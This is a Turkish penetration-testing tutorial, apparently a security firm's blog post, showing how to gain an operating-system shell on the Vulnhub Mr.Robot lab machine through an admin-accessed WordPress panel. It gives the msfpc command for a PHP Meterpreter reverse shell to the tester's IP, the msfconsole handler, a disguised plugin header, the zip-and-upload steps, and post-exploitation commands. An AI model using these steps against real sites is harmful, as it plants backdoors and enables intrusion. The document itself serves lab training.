Erişim Sağlanan WordPress Yönetim Arayüzünde MSFVenom Payload Creator ile Oluşturulan PHP Kodunun Gömülerek İşletim Sistemine Erişim Sağlanması

0
250
views
Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan WordPress yönetim arayüzü MSFVenom Payload Creator ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe eklenti olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/mr-robot-1,151/

Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.

 

MSFVenom Payload Creator ile arka kapı amaçlı kullanılabilecek standalone (stageless) bir PHP kodu aşağıdaki gibi hazırlanabilir.

msfpc php 192.168.2.71 443 msf reverse stageless tcp

 

MSF handler dosyası (Resource File) otomatik olarak hazırlanmıştır.

ls
cat /root/Shell/php-meterpreter-stageless-reverse-tcp-443.rc

 

Hazırlanan bu dosya ile MSF handler modülü çalıştırılabilir ve TCP 443. porta gelen talepler yakalanabilir.

msfconsole -q -r ‘/root/php-meterpreter-stageless-reverse-tcp-443-php.rc’

 

Hedef sisteme yüklenecek olan zararlı PHP kodunun bir eklenti olarak değerlendirilmesi için yorum satırı içinde aşağıdaki gibi bir takım bilgiler girilir.

/*
Plugin Name: Yeni Eklenti
Plugin URI: Bir URI
Description: Bir Tanim
Author: Bir Yazar Adi
Version: v1.0
Author URI: Yazara Ait URI
*/

 

Sonrasında da eklenti sıkıştırılmış dosya haline getirilir.

zip ArkaKapiEklentisi.zip php-meterpreter-stageless-reverse-tcp-443.php

 

Eklentiler menüsünde “Add New > Upload Plugin” adımları izlenerek hazırlanan eklenti uygulamaya yüklenebilir.

 

Hazırlanan “ArkaKapiEklentisi.zip” dosyası seçilir ve eklenti olarak yüklenir.

 

Böylece eklenti yüklenmiştir.

 

Eklentiler menüsünden de hazırlanan bu eklenti listenebilir.

 

“Activate” bağlantısı kullanılarak bu eklenti etkinleştirildiğinde Meterpreter bağlantısının yakalandığı görülür.

sessions
sessions -i 1
getuid
getpid

 

Elde edilen erişimin (3054 ID’li proses) WordPress uygulaması üzerinden sağlandığı görülebilir.

shell
id
ps -ef | grep 3054

 

Kaynak:

https://que.com/2016/12/04/ctf-hacking-mr-robot/
http://www.r00tsec.com/2015/08/howto-create-backdoor-in-wordpress.html

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.